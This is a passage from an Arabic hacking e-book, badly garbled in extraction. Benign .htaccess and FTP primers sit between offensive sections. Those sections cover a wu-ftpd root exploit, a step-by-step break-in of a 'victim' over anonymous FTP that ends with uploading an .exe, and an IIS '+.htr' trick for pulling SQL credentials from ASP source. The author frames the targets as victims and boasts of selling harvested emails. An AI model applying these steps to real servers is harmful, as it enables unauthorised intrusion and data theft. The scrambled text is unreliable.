نظام التشغيل ده‬ ‫كده يبقى كل اللي تعمله انك تعمل كومبايل للثغره دي و بشغلها على سيرفر‬ root access ‫الموقع المستهدف و كده حيديك‬ (-. ‫ الموجوده‬annonymous ‫لو لحظت اننا استغلينا خاصيه ال‬ 209 .U will find what U wanna .‫بعض الثغرات بتحتاجه‬.FTPd ‫احصل على الكسبلويت بتاعه الفيرجين ديه من‬ ( ‫)اللي يعمل سيرش ميتوهش‬ wuftpd2600.Guest login ok...net -230 .

.‬و كل اكسبلويت لها ساينتكس و شغل‬ ‫خاص بيها‪.‬في هذه الحاله الكسبلويت مش تشتغل ال لو معانا باسورد و يوزر نيم‬ ‫عشان نخش على الف تي بي بتاع الموقع‪..‬‬ ‫عشان كده لزم تقرا السورس بتاع الكسبلويت‪.‬‬ ‫انتهى‪،،،‬‬ ‫" شرح ملف ‪" htaccess‬‬ ‫‪210‬‬ .‬بس المبادئ الساسيه و احده‪.‫دي مش موجوده ‪...‬يبقى مش حنعرف نكمل الكلم ده‬ ‫عشان الكسبلويت مش تشتغل ‪..

‫>ةةةةة<‬
‫>ةةةةةة‪< BSD-r00t :‬‬
‫|‬

‫| * مقدمـــة‬
‫|‬
‫| * اهمية ملف ‪htaccess.‬‬
‫|‬
‫| * كيفية عمل ملف ‪htaccess.‬‬
‫|‬
‫| * عمل صفحات ‪ error‬خاصة‬
‫| * منع عرض محتويات المجلد الذي ل يوجد به ‪| index‬‬
‫|‬
‫| * منع‪/‬اتاحة دخول الموقع لشخاص معينة‬
‫|‬
‫| * تحويل من يحاول فتح لينك للينك اخر‬
‫|‬
‫| * عمل الملف ‪.htpasswd‬‬
‫|‬
‫| *الحماية بواسطه ‪htaccess.‬‬
‫|‬
‫| * منع اظهار الملف ‪htaccess.‬‬
‫|‬
‫| * اضافة مستخدمين في الملف‬
‫|‬
‫| * جعل الصفحات تظهر بامتداد اخر‬
‫‪-------------------------------------------------‬‬‫* مقدمـــة‬
‫‪-----------‬‬‫من اهم وسائل حماية المواقع و اغلق بعض الجزاء فيه بكلمة سر ‪ ,‬و منع بعض الناس من دخل الموقع و‬
‫السماح‬
‫لغيرهم بالدخول ‪ ..‬هو استخدام الملف ‪ htaccess.‬و الذي يمكن عمل الكثير و الكثير به ‪.‬‬
‫و هذا الملف مخفي و محمي بكلمة سر‬
‫* اهمية ملف ‪htaccess.‬‬
‫‪----------------------‬‬‫‪ -1‬حماية اي جزء فيه بكملة سر‬
‫‪ -2‬عمل صفحات ‪ error‬خاصة بك‬
‫‪ -3‬منع عرض محتويات المجلد الذي ل يوجد به ‪index‬‬
‫‪ -4‬منع‪/‬اتاحة دخول الموقع لشخاص معينة‬
‫‪ -5‬جعل صفحة البداية بأمتدادات غير ‪.. html , .asp.‬‬
‫‪ -6‬تحويل من يحاول فتح لينك للينك اخر‬
‫* كيفية عمل ملف ‪htaccess.‬‬
‫‪--------------------------‬‬‫يمكنك عمل هذا الملف بواسطه اي محرر نصوص مثل النوت باد "‪ "Notepad‬عن طريق عمل للملف‬
‫حفظ باسم و نحفظ‬
‫الملف بهذا السم ‪ htacces.‬على ان يكون ليس امتداده ‪ txt.‬اي ان ليس هناك اسم للملف ‪ ,‬اذا لم تستطيع‬
‫ذلك‬
‫احفظ الملف باسم "‪ - "htaccess.‬علمتي التنصيص في اسم الملف ‪. -‬‬
‫* عمل صفحات ‪ error‬خاصة‬
‫‪-----------------------‬‬‫و الفائدة منها هو ان الموقع يظهر بشكل افضل كما انه عند محاولة اي شخص عمل سكان على الموقع‬
‫سوف يظهر كان‬
‫الموقع به كل الثغرات و ذلك لن طريقة عمل السكانر هي انه يقوم بتطبيق كل ثغره على الموقع و يرصد‬
‫النتيجه‬
‫‪211‬‬

‫فاذا كان هناك اي تغير يظهر لك كأن الموقع عليه هذه الثغره ‪.‬‬
‫و يمكنك عمل صفحات ال ‪ error‬الخاصه ك عن طريق ‪-:‬‬
‫أ‪ -‬تصميم صفحات ال ‪ error‬اول‬
‫ب‪ -‬تحميل الصفحات على الموقع‬
‫ج‪ -‬اضافه السطر التابي في الملف ‪htaccess.‬‬
‫‪ErrorDocument error_num‬‬
‫‪directory_file‬‬
‫بخيث يكون ‪ error_num‬هو رقم الخطا " الرقام موجود بالسفل " و ‪ directory_file‬هو مكان‬
‫صفحه ال ‪ error‬التي‬
‫قمت بتصميمها ‪.‬‬
‫‪ErrorDocument 404‬‬
‫مثال ‪:‬‬
‫‪/errors/nfound.html‬‬
‫ال ‪ errors‬و ارقامها ‪- :‬‬
‫‪----------------------‬‬‫| ‪| Bad Syntax | 400‬‬
‫‪----------------------‬‬‫| ‪| Unauthorized | 401‬‬
‫‪----------------------‬‬‫|‬
‫| ‪Not Used | 402‬‬
‫‪----------------------‬‬‫| ‪| Forbidden | 403‬‬
‫‪----------------------‬‬‫| ‪| Not Found | 404‬‬
‫‪----------------------‬‬‫* منع عرض محتويات المجلد الذي ل يوجد به ‪index‬‬
‫‪----------------------------------------------‬‬‫بعض المواقع عند محاولة فتح اي دليل عليها و ل يكون به ملف ‪ index‬يقوم الموقع بسرد جميع محتويات‬
‫هذا الدليل‬
‫و لحل هذه المشكله توجد طريقتين ‪-:‬‬
‫أ‪ -‬وضع ملف ‪ index‬في كل المجلدات " و بالطبع هذا صعب جدا "‬
‫ب‪ -‬باستخدام الملف ‪ htaccess.‬عن طريق اضافه السطر التالي في الملف ‪-:‬‬
‫‪Options -Indexes‬‬
‫* منع‪/‬اتاحة دخول الموقع لشخاص معينة‬
‫‪------------------------------------‬‬‫يمكنك باستخدام الملف ‪ htaccess.‬منع شخص معين من دخول الموقع بعد معرفة الي بي الخاصه به و‬
‫يمكنك التسفاده‬
‫من ذلك حيث يمكنك منع دخل الموقع لمن ل تريد كما يمكنك منع دخول الموقع لي شخص في اسرائيل‬
‫مثل ‪..‬‬
‫و يمكنك ذلك عن طريق اضافة السطر التالي في الملف ‪- :‬‬
‫???‪deny from ???.???.???.‬‬
‫حيث ان ؟؟؟‪.‬؟؟؟‪.‬؟؟؟‪.‬؟؟؟ هو الي بي الخاص به ‪.‬‬
‫واذا اردت منع اي احد من دخول الموقع يمكنك اضافة السطر التالي ‪-:‬‬
‫‪deny from all‬‬
‫واذا اردت السماح لشخص معين بدخول الموقع يمكنك ذلك باضافة السطر التالي ‪-:‬‬
‫؟؟؟‪.‬؟؟؟‪.‬؟؟؟‪.‬؟؟؟ ‪allow from‬‬

‫‪212‬‬

‫حيث انا ؟؟؟‪.‬؟؟؟‪.‬؟؟؟‪.‬؟؟؟ هو الي بي الخاص به‬
‫* تحويل من يحاول فتح لينك للينك اخر‬
‫‪------------------------------------‬‬‫وتسمى هذه العمليه ب ‪ Redirection‬وهي من اهم فوائد ‪ htaccess.‬الملف تستخدم مثل عند تغير‬
‫موقع ملف قديم‬
‫على الموقع الى مكان جديد فيمكنك باستخدام الملف ‪ htaccess.‬عند محاولة احد فتح احد الينك القديم‬
‫توجيه‬
‫الى الينك الجديد عن طريق اضافة السطر التالي في الملف ‪-:‬‬
‫???‪Redirect /somewhere/???.???/???.‬‬
‫‪http://www.site.com/newlocation‬‬
‫بحيث يكون ‪ ???.???/somewhere/‬هو مكان الملف القديم و‬
‫‪ ???.???/http://www.site.com/newlocation‬هو مكان‬
‫الملف الجديد‪.‬‬
‫‪---------‬‬‫* عمل الملف ‪.htpasswd‬‬
‫‪-----------------------‬‬‫ويمكنك تقوم بعمله بنفس طريقة الملف ‪ , htaccess.‬و سوف نعمله تى نسطيع استخدام الملف ‪.‬‬
‫‪htaccess‬‬
‫في الحماية و سوف نكتب في الملف ‪ htpasswd‬ما يأتي ‪-:‬‬
‫‪user1:EncryptedPwd1‬‬
‫‪user2:EncryptedPwd2‬‬
‫‪ o‬حيث ان ‪ user1 , user2‬هو اسم المستخدم ‪.‬‬
‫‪ o‬و ‪ EncryptedPwd1 , EncryptedPwd2‬هي كلمات السر ولكن مشفره و يمكنك تشفير اي‬
‫كلمة تريدها‬
‫عن طريق الموقع‬
‫‪http://www.euronet.nl/~arnow/htpasswd‬‬
‫او‬
‫‪http://www.e2.u‬‬‫‪net.com/htaccess/make.htm‬‬
‫فمثل لو اردنا وضع يوسر باسم ‪ Security‬و كلمة السر الخاصة به هي ‪ fu93hds3‬نذهب اول الى‬
‫الموقع‬
‫‪http://www.euronet.nl/~arnow/htpasswd‬‬
‫‪ o‬و ‪username : Security‬‬
‫‪ o‬و ‪passwrod & re-enter password : fu93hds3‬‬
‫‪ o‬و نضغط على الزر ‪ claculate‬لتظهر النتيجه ‪Security:893bNicBcwszw <--‬‬
‫و الن قد اتممنا عمل الملف ‪ htaccess.‬و الذي قمنا بعمله و ذلك لكي نستطيع استخدام الملف ‪.‬‬
‫‪htaccess‬‬
‫للحماية بكلمة سر و يوسر ‪.‬‬
‫* الحماية بواسطه ‪htaccess.‬‬
‫‪---------------------------‬‬‫و تعتبر الفائدة الرئيسية للملف حيث انه يمكن منع اي احد من دخول دليل معين في الموقع ال اذا كان معه‬
‫كلمة السر و اليوسر نيم ‪ ,‬فيمنكنك عن طريقها عمل منتدى خاص او اي شئ تريد‪.‬‬
‫فعند وضع الملف ‪ htaccess.‬في اي دليل و حاول احد دخول هذا الدليل او اي جزء يندرج تحته سوف‬
‫يطلب منه‬
‫كلمة سر و يوسر ‪.‬‬

‫‪213‬‬

‫و يمكنك عمل ذلك عن طريق اضافة ما يأتي في الملف قبل نسخه في الدليل المراد حمايته ‪--:‬‬
‫‪AuthUserFile /somewhere/.htpasswd‬‬
‫"‪AuthName "Enter your user and passed‬‬
‫‪please‬‬
‫‪Require valid-user‬‬
‫‪AuthType Basic‬‬
‫>‪<Limit GET POST‬‬
‫‪require valid-user‬‬
‫>‪<Limit/‬‬
‫‪ o‬بحيث يكون ‪ /somewhere/.htpasswd‬هو مكان ملف ‪ htpasswd.‬على موقعك‬
‫‪ o‬و يكون ‪ Enter your user and passed please‬هي الرساله التي سوف تظهر لتطلب كلمة‬
‫السر‬
‫* منع اظهار الملف ‪htaccess.‬‬
‫‪----------------------------‬‬‫قد عرفنا الن ان لهذا الملف اهميه كبيره فيجب علينا ان نحميه جيدا ‪ ,‬فالبرغم من ان الملف مخفي ال‬
‫انه غير سالم من ان يكون السرفر نفسه غير مؤمن او انه هناك تصريح خطأ ‪..‬‬
‫لذلك سوف نمنع عرض هذا الملف عن طريق اضافة ما يأتي ‪- :‬‬
‫>‪<Files .htaccess‬‬
‫‪order allow,deny‬‬
‫‪deny from all‬‬
‫>‪<Files/‬‬
‫فاذا حاول احد عرض الملف سوف يظهر له ‪. error 403‬‬
‫* جعل الصفحات تظهر بامتداد اخر‬
‫‪------------------------------‬‬‫ويمكن باستخدام هذه الخاصية عمل ملف يظهر كأن امتداده ‪ html.‬و لكنه ذو امتداد ‪ txt.‬مثل ‪.‬‬
‫باضاف السطر التالي ‪-:‬‬
‫‪AddType text/plain html‬‬
‫ويمكنك رؤية كافى التغيرات التي يمكنك عملها في هذا الملف ‪-:‬‬
‫‪http://www.pharaonics.net/books/MIME.txt‬‬
‫انتهى‪،،،‬‬

‫" نظام نقل الملفات ‪" FTP‬‬

‫‪214‬‬

‫>ةةةةة ةة ةةةةة ةةةةة<‬
‫>ةةةةةة‪ :‬ةةةةةة<‬
‫ما هو نقل الملفات ‪ FTP‬؟‬
‫‪ FTP‬هي اختصار لكلمة ‪ File Transfer Protocol‬وتعني بروتوكول نقل الملفات‪ ،‬وهذه الخدمة هي‬
‫احدى تسهيلت ‪ TCP/IP‬التي تجعل من الممكن نقل الملفات بين الكمبيوترات على الشبكة ومن ميزات‬
‫‪ FTP‬الرائعة أنها تقوم بترجمة شكل الملفات النصية بطريقة أتوماتيكية حيث أن الكمبيوترات تحتوي نظم‬
‫تشغيل مختلفة وعليه فلديها أشكال ‪ Formats‬مختلفة للملفات النصية فبالتالي تحتاج لترجمة وهو ماتقوم‬
‫به ‪ ,FTP‬وبخدمة نقل الملفات فاننا نحتاج لبضع نقرات على الفأرة كي ننقل ملفًا في أميركا الى جهازنا ‪.‬‬
‫أقسام نقل الملفات‪:‬‬
‫نقل الملفات ينقسم الى قسمين‪:‬‬
‫تنزيل الملفات ‪:Download‬‬
‫وهو جلب الملفات من الكمبيوتر المضيف ‪ Host‬الى الجهاز المحلي ‪.Local‬‬
‫ارسال الملفات ‪:Uplaod‬‬
‫وهو ارسال الملفات من الكمبيوتر المحلي ‪ Local‬الى الكمبيوتر المضيف ‪.Host‬‬
‫ومن الناحية المنية فهناك نوعان لنقل الملفات‪:‬‬
‫نقل مؤمن ‪:Secure FTP‬‬
‫تحتاج الى اسم مستخدم وكلمة مرور للدخول الى النظام وتحصل عليه من مدير النظام المضيف‪.‬‬
‫نقل مجهول ‪:Anonymous FTP‬‬
‫لتحتاج الى اسم مستخدم وكلمة مرور للدخول وتستطيع غالبًا استخدام ‪ guest‬أو ‪ anonymous‬عوضًا‬
‫عنهما‪.‬‬
‫تصنف مصادر البرامج على النترنت الى ثلثة أقسام‪:‬‬
‫ملكية عامة ‪:Public Domain‬‬
‫وضعت البرامج هنا للستخدام العام فليس هناك حقوق ملكية لحد ول قيود على استخدامها وتوزيعها‬
‫وتعديلها‪.‬‬
‫مصادر مجانية ‪:Freeware‬‬
‫يحق للجميع استخدام هذه البرامج أو توزيعها ولكن هناك حقوق ملكية ونشر ول يجوز تعديلها أو بيعها‪.‬‬
‫مصادر مشتركة ‪:Shareware‬‬
‫يتم توزيع هذه البرامج بغرض التجربة قبل الشراء وقد لتتضمن جميع المميزات ويجب تحطيم النسخ بعد‬
‫‪215‬‬

‫انتهاء مدتها‪.‬‬

‫‪ FTP‬و الفيروسات ‪:‬‬
‫يجب أن تعلم في البداية أن الملفات والبرامج تنقسم الى قسمين‬
‫‪:ASCII‬‬
‫اختصارًا لـ)‪ (American Standard Code for Information Interchange‬والملفات من‬
‫هذا النوع تحتوي على سبعة جزيئات ‪ bits‬تتراوح قيمتها بين الصفر و ‪ .127‬ويستخدم هذا المصطلح‬
‫للتعبير عن المعيار الذي يقوم بتحويل الحرف الى أرقام في الكمبيوتر‪ .‬وتستخدم الملفات النصية هذا النوع‬
‫من الصيغ‪.‬‬
‫‪:Binary‬‬
‫وتعني الملفات ذات النظام الثنائي وتحتوي على ثمانية جزيئات ‪ bits‬تتراوح بين الصفر و ‪ 255‬وتندرج‬
‫الصور والبرامج والملفات المضغوطة تحت هذا النوع‪.‬‬
‫والفيروسات ل يمكن أن تنتقل عبر ملفات ‪ ASCII‬كما ليمكن أن تنتقل عبر الصور كصيغ & ‪jpg & gif‬‬
‫‪ bmp‬وغيرها من امتدادات الصور ول عبر ملفات الفيديو والصوت مثل ‪avi - ram - mpg - mp3 -‬‬
‫‪ wav‬وغيرها‪ ،‬وبمعنى آخر فانها تنتقل عبر البرامج وملفات النظام والتشغيل والبرامج المضغوطة وعادة‬
‫ماتكون‪exe - com - bat - dll - drv - sys - bin - ovl - zip - mim - uue - xxe - :‬‬
‫‪ ،b64 - bhx‬كما يمكن أن تنتقل فيروسات الماكرو عبر تطبيقات ‪ ،MS Office‬لذلك احذر من هذه‬
‫الملفات وافحصها دائمًا قبل تشغيلها‪.‬‬

‫طريقة نقل الملفات ‪: FTP‬‬
‫هناك طرق عديدة لنقل الملفات وهي‪:‬‬
‫نقل الملفات باستخدام نظام ‪UNIX‬‬
‫تتطلب هذه العملية عادة استخدام أوامر وهاهنا بعض أوامر ‪:UNIX‬‬
‫‪ :ascii‬لنقل ملفات ‪ ASCII‬النصية‪ ،‬وعند تغيير هذا الوضع ثم الحاجة لنقل ملفات من هذا النوع فيجب‬
‫اعادة المر‪.‬‬
‫‪ :binary‬لنقل الملفات الثنائية‪ ،‬وعند تغيير هذا الوضع ثم الحاجة لنقل ملفات من هذا النوع فيجب اعادة‬
‫المر‪.‬‬
‫‪ :status‬لفحص الملف ومعرفة هل هو من نوع ‪ ASCII‬أو ‪.Binary‬‬
‫‪ :help‬لعرض قائمة بأوامر ‪.UNIX‬‬

‫‪216‬‬

‬‬ ‫‪ :pwd‬طباعة الدليل الحالي‪.‬‬ ‫‪ :get filename‬جلب الملف المطلوب وانزاله على جهازك‪.com‬ثم في خانة ‪ Host Type‬اختر ‪ Auto Detect‬لكي يقوم بالتدقيق‬ ‫التلقائي في نوع نظام الجهاز المضيف‪ ،‬بعد ذلك قم بكتابة السم في خانة ‪ User ID‬وهو مث ً‬ ‫ل‬ ‫‪ IronPrivate‬ثم الرقم السري في خانة ‪ Password‬وسيظهر مخفيًا على هيئة نجوم ******‪ .Client Programs‬وأفضل‬ ‫برنامج تابع يمكن استخدامه للنوافذ ‪ Windows‬هو برنامج ‪.‬‬ ‫نقل الملفات باستخدام المتصفح ‪:Browser‬‬ ‫نقل الملفات عن طريق المتصفحات سهل جدًا فما عليك سوى ادخال عنوان الموقع ‪ URL‬ويبدأ العنوان‬ ‫بكلمة ‪ ftp://‬ثم العنوان بدًل من كلمة ‪ http://‬للعناوين العادية‪ ،‬بعد الدخول الى موقع الـ ‪ FTP‬ستأتي‬ ‫الصفحة عبارة عن ملفات ومجلدات وماعليك سوى النقر على الملف المطلوب لنزاله‪.‬‬ ‫وهو مث ً‬ ‫وإذا أردت المزيد من المعلومات عن نظام الـ ‪Unix‬‬ ‫عليك الدخوول الى هذا الموقع ‪:‬‬ ‫‪http://www.pc-worlds.‬‬ ‫‪ :bye‬انهاء الرتباط والخروج من النظام البعيد‪.‫‪ :dir‬عرض محتويات الدليل‬ ‫‪ :ls‬عرض محتويات الدليل الحالي‪.OK‬كما في الشكل التالي‪:‬‬ ‫‪217‬‬ .‬‬ ‫‪:mget filename‬جلب مجموعة من الملفات‪.‬‬ ‫‪ :cd directory‬تغيير الدليل‪.‬‬ ‫نقل الملفات باستخدام حساب ‪:SLIP/PPP‬‬ ‫أفضل استخدامات هذا النوع من الربط أنها تسمح لنا باستخدام برامج تابعة ‪ .tripod.06‬‬ ‫ادخل على البرنامج وذلك بالنقر المزدوج على أيقونة البرنامج‪ ،‬سيظهر لك مربع حوار ‪Session‬‬ ‫‪ Profile‬والذي من خلله تقوم بتسجيل الدخول‪ ،‬اكتب في خانة ‪ Profile Name‬اسم حساب الدخول؛‬ ‫على سبيل المثال ‪ My Home Page In Tripod‬واكتب في خانة ‪ Host Name‬اسم الملقن وفي هذا‬ ‫المثال هو ‪ ftp.‬وبعد الدخول الى الحساب يمكنك استخدام نفس أوامر ‪ Unix‬المعتادة‪.‬ثم اضغط‬ ‫‪ .net/lunexx.tripod.Ws_ftp‬‬ ‫استخدام برنامج ‪:Ws_ftp LE 5.html‬‬ ‫فهو يفيد المبتدئين فى هذا النظام ‪.com‬ثم ندخل السم وهو عل سبيل المثال "‪ ،"IronPrivate‬ثم نقوم بادخال الرقم السري‬ ‫ل "******"‪ .‬‬ ‫نقل الملفات باستخدام حساب ‪:Shell‬‬ ‫ل سوف تدخل‬ ‫أول ماتفعله في هذا النوع من نقل الملفات هو ادخال الملقن الخاص بشركة توفير الخدمة فمث ً‬ ‫حسابك في ‪ Tripod‬عن طريق ‪ ،Unix Shell‬نكتب أوًل المر ‪ ftp‬متبوعًا بالوجهة المرادة فيصبح‪ftp :‬‬ ‫‪ ftp.

‬ويختلف العرض حسب نظام الكمبيوتر المضيف‪.‫بعد ذلك سيقوم البرنامج بالدخول الى الحساب المطلوب وستنقسم نافذة البرنامج الى قسمين؛ القسم اليسر‬ ‫هو جهاز الكمبيوتر لديك والقسم اليمن هو جهاز الكمبيوتر المضيف‪ ،‬في هذه المرحلة تستطيع جلب أو‬ ‫ارسال الملفات أو تغيير اسمائها أو حذفها ‪ .Exit‬‬ ‫انتهى‪،،،‬‬ ‫" الختراق عن طريق ‪"FTP‬‬ ‫‪218‬‬ .‬‬ ‫مضيف جاع ً‬ ‫اذا كان الجهاز البعيد يستخدم نظام ‪ Windows‬فل مشكلة أما اذا كان يستخدم نظام آخر فيجب معرفة بعض‬ ‫الوامر للتحكم وأهم أمر يجب أن تعرفه هو "؟" والذي يحضر لك قائمة بالوامر اللزمة‪..‬من ‪ Connect‬اختر ‪Remote‬‬ ‫‪ .‬الخ‪ ..‬وبعد النتهاء من النقل اختر ‪ Disconnect‬من قائمة ‪ Connect‬وبعد ذلك‬ ‫اختر ‪.‬بعد ذلك اضغط ‪ Connect‬وعندما يتم الربط فستحتاج‬ ‫لدخال السم والرقم السري‪ .‬‬ ‫نقل الملفات باستخدام التصال الشبكي البعيد ‪:Telnet‬‬ ‫‪ Telnet‬هي بروتوكول انترنت معياري لخدمات الربط عن بعد ويسمح للمستخدم بربط جهازه على كمبيوتر‬ ‫ل جهازه وكأنه جزء من ذلك الكمبيوتر البعيد‪ .‬‬ ‫ استخدام برنامج ‪ Telnet‬من ‪:Windows‬‬‫ل يسمى ‪ Telnet‬يمكنك الدخول عليه بالضغط على قائمة ابدأ ‪ Start‬ثم‬ ‫ترفق ‪ Windows‬برنامجًا سه ً‬ ‫تشغيل ‪ Run‬ثم اكتب ‪ Telnet‬وستنفتح لك صفحة البدء للبرنامج‪ .‬أي تستطيع التحكم في محتويات حسابك على النترنت أو‬ ‫على جهازك بسهولة فائقة‪.System‬في صندوق الحوار ‪ Connect‬الذي سيظهر لك اكتب في خانة ‪ Host Name‬اسم ملقن‬ ‫الجهاز المضيف ثم اكتب في خانة ‪ Port‬الميناء أو المنفذ ) اذا كان لديك( او اتركه كما هو‪ ،‬ثم اختر من الـ‬ ‫‪ ، Term Type‬ان كان لديك وال قم بالتجربة‪ ..

(websrv1 Microsoft FTP Service (Version 4.password‬‬ ‫و الن أكتب الكتابة التالية‬ ‫‪ftp>quote cwd ~root‬‬ ‫إدا تحصلت على هدا الرد فقد تخطيت خطوة‬ ‫‪Please login with USER and PASS 530‬‬ ‫ثم أكتب الكتابة التالية‬ ‫‪ftp>quote pass ftp‬‬ ‫‪219‬‬ .assassin. send identify (e-mail name) as 331‬‬ ‫‪.‫>ةةةةة ةة ةةةةة ةةةةة ةةةةة<‬ ‫>ةةةةةة‪< hacker dz :‬‬ ‫اليوم سوف نتناول طريقة إقتحام عبر فتيبي‬ ‫‪FTP‬‬ ‫أول و لنجاح القتحام يجب ان يكون لدى الضحية البور‬ ‫‪21‬‬ ‫مفتوح و هو البور الخاص ب‬ ‫‪FTP‬‬ ‫و لتأكد من أن البور مفتوح عليك ان تستعمل برامج السكان و هي كثيرة و من اهمها‬ ‫‪Superscanne‬‬ ‫بعدما تتأكد ان البور مفتوح ننتقل الى الخطوة الثانية و هي‬ ‫إضغط على‬ ‫‪Start‬‬ ‫ثم‬ ‫‪Run‬‬ ‫ثم اكتب‬ ‫‪ftp –n‬‬ ‫سوف تطلع لك نافدة في الدوس مكتوب عليها‬ ‫‪<FTP‬‬ ‫ؤوكي لحد هنا كل شيء تمام‬ ‫و بعدين اكتب‬ ‫‪Open‬‬ ‫ثم إضغط على‬ ‫إدخال‬ ‫‪Enter‬‬ ‫سوف تتحصل عب النتيجة التالية‬ ‫‪<FTP‬‬ ‫‪To‬‬ ‫أكتب بجانب‬ ‫‪To‬‬ ‫رقم البي للضحية ثم إضغط على إدخال‬ ‫و الن خد بالك معي‬ ‫إدا تحصلت على هدا الرد فقد تخطيت خطوة‬ ‫‪Connected to www.com‬‬ ‫‪.0 220‬‬ ‫و الن أكتب الكتابة التالية‬ ‫‪ftp>quote user ftp‬‬ ‫إدا تحصلت على هدا الرد فقد تخطيت خطوة‬ ‫‪Anonymous acces allowed.

about to open data connection‬‬ ‫‪150‬‬ ‫‪.exe‬‬ ‫‪Clos‬‬ ‫لقطع التصال مع الضحية‬ ‫هدي أهم الوامر و الن سون تطرق على أنواع الرسائل الي نتحصل عليها من جهاز الضحية أثناء تطبيق‬ ‫الوام و شرحها و ارقامها‬ ‫‪:Codes:‬‬ ‫‪Signification‬‬ ‫‪.‫إدا تحصلت على هدا الرد فقد تخطيت خطوة‬ ‫و نجحت في القتحام‬ ‫‪.Directory status‬‬ ‫‪212‬‬ ‫‪220‬‬ .Command okay‬‬ ‫‪200‬‬ ‫‪.Command not implemented.Data connection already open. superfluous at this site‬‬ ‫‪202‬‬ ‫‪.Restart marker reply‬‬ ‫‪110‬‬ ‫‪(Service ready in nnn minutes. transfer starting‬‬ ‫‪125‬‬ ‫‪. or system help reply‬‬ ‫‪211‬‬ ‫‪. (nnn est un temps‬‬ ‫‪120‬‬ ‫‪.System status.File status okay.exe‬‬ ‫‪Put‬‬ ‫العملية العكسية ل‬ ‫‪Get‬‬ ‫يعني ان تأخد ملف من سطح المكتب بتاع جهازك و تضعه في‬ ‫في جهاز الضحية‬ ‫مثال‬ ‫‪Put black.Anonymous user logged in 230‬‬ ‫مبروك أنت الن في جهاز الضحية‬ ‫ما عليك الن ال ان تقوم بإستعمال‬ ‫اوامر الفتيبي‬ ‫و طبعا لن امر عليها مرور الكرام لكي ل تقعو في المشكلة الي وقعت فيها و هي نجاح القتحام من دون ما‬ ‫أعرف و ل فكرة على اوامر الفتيبي و إدا اردتم ان تضحكو بقاليأكثر من ‪ 20‬دقيقة و انا مجمد اليدي و‬ ‫الضحية عالقة من دون أن أعمل أي شيء و لهدا‬ ‫قمت بحضير الىوامر لكي تطبقوها مباشرةا بعد نجاح القتحام‬ ‫‪Pwd‬‬ ‫لكي تعر ما يحتويه الهارد ديسك‬ ‫‪Cd‬‬ ‫لقتحام مجلد مثال‬ ‫‪Cd black‬‬ ‫في هدا المثال قمت بإقتحام مجلد المسمى بلك‬ ‫‪Ls‬‬ ‫لكي يتضح لك محتوى المجلد أو الهارد ديسك‬ ‫‪Get‬‬ ‫لكي تحمل الى سطح المكتب بتاع جهازك‬ ‫مثال‬ ‫‪Get black.

(Nom de fichier non attribué 553 ،،،‫انتهى‬ " SQL ‫" اختراق الـ‬ 221 .Help message . need password ..Service closing control connection .Requested file action aborded 552 (Requested action not taken.Service not available.(Entering passive mode (h1.Can't open data connection .Syntax error in parameters or arguments 501 . command unrecognized 500 ..NAME system type .File status .possible . closing control connection . completed .User logged in.Data connection open.Need account for login . p1. h2.Need account for storing files 532 Requested action not taken. transfer aborded Requested file action not taken.Requested file action okay..Bad sequence of commands 503 . (Fichier déjà utilisé par autre 213 214 215 220 221 225 226 227 230 250 257 331 332 350 421 425 426 450 (chose . no transfer in progress .Service ready for new user .PATHNAME" created" .Connection closed.. h4. (Pas assez de mémoire pour 452 (exécuter l'action . (Fichier non trouvé.Closing data connection .Requested file action pendingfurther information .User name okay.Requested action aborded: local error processing 451 Requested action not taken.Not logged in 530 . p2 . proceed .Command not implemented 502 .Requested action aborded: page type unknown 551 .Syntax error.Command not implemented for that parameter 504 . pas d'accès 550 (. h3.

.+‬‬ ‫كيف تستخدم هذه الثغرة ‪:‬‬ ‫‪http://target/page.‫>ةةةةة ةة ةةةةة ةةةةة<‬ ‫>ةةةةةة‪< linuxray :‬‬ ‫س ‪:‬في البداية ماهي الس كيو ال ) ‪( SQL‬؟؟‬ ‫الس كيو ال هي عبارة عن قاعد بيانات تحتوي على جداول واغلب المواقع التي تكون صفحاتها منتهية ب‬ ‫‪ ASP‬هي صفحات تسحب بياناتها‬ ‫من قاعدة ‪ SQL‬وصفحات ‪ ASP‬ممكن ان تكون كنز من المعلومات لختراق قواعد بيانات ‪ SQL‬وهذا‬ ‫ماسوف اشير اليه لحقا ‪ ،‬و ‪SQL‬‬ ‫تتنصت على البورت ‪1433‬‬ ‫ايضا مااريد ان اخبرك به ان ال ‪ SQL‬قد تحتوي على اكثر من قاعدة بيانات وكل قاعدة بيانات تحتوي على‬ ‫عدد من الجداول يمكن‬ ‫ان تتصور كبرقواعد بيانات ‪ SQL‬والعدد الكبير من البيانات التى تحتويها ‪.‬هناك ثغرات كثير يمكن‬ ‫ان تحصل منها على كلمات المرور مثل ثغرة ‪htr.+‬الثغرة‬ ‫هذه الثغرة تقوم احيانا بفتح صفحة بيضاء لتحتوي على اي حرف ‪ ..‬‬ ‫س ‪ :‬مالذي يمكن ان استفيد منه اذا اخترقت قاعدة بيانات ‪ SQL‬؟‬ ‫هذا على حسب نشاط الموقع اذا كان هذا الموقع منتدى ل اقصد منتديات ‪ PHP‬بل منتديات ‪ ASP‬في الغالب‬ ‫سوف تحصل على جميع اسماء‬ ‫المستخدمين وكلمات السر وبامكانك تعديل وحذف اي موضوع وصلحيات لم تكن تحلم بها ‪ ،‬اما اذا كان‬ ‫الموقع يحتوي على ميزة‬ ‫قائمة المراسلت فسوف تحصل على اعداد خيالية من اليميلت ‪ ،‬عندها قم بانشاء شركة للدعاية والعلن‬ ‫وسوف تصبح ثريا اذن لتنسى ‪_LinuxRay‬‬ ‫توقع ان تجد اي شئ داخل قواعد بيانات معلومات اشخاص ‪ -‬ارقام هواتف ‪ -‬عناوين ‪ -‬تورايخ الميلد ‪،‬‬ ‫ممكن ان تصبح ‪.. Administrator‬‬ ‫اعرف انه قد اصابك الملل الن لكن استعد نشاطك من جديد فالطريق مازال طويل ‪.asp+.‬اعرف انك سوف تتساءل مالفائدة‬ ‫اذن منها الفائدة هو‬ ‫خلف هذه الصفحة البيضاء اذهب الى ‪ View Source‬لكي ترى اوامر البرمجة الخاصة ب ‪ ASP‬التى‬ ‫ليمكن لك ان تراها في الوضع العادي ‪ :‬مثل‬ ‫‪222‬‬ .htr‬‬ ‫‪ : target‬الموقع الهدف‬ ‫‪ : Page‬صفحة ‪asp‬‬ ‫‪ : htr..‬‬ ‫س ‪ :‬مالذي تحتاجة للدخول على قواعد بيانات ‪ SQL‬؟‬ ‫تحتاج فقط لل ‪ User Name‬و ‪Passwd‬‬ ‫س ‪ :‬من اين احصل على اسم المستخدم وكلمة المرور ؟‬ ‫هناك طرق عديدة للحصول على ‪ User name and Passwd‬منها كما اسلف صفحات ال 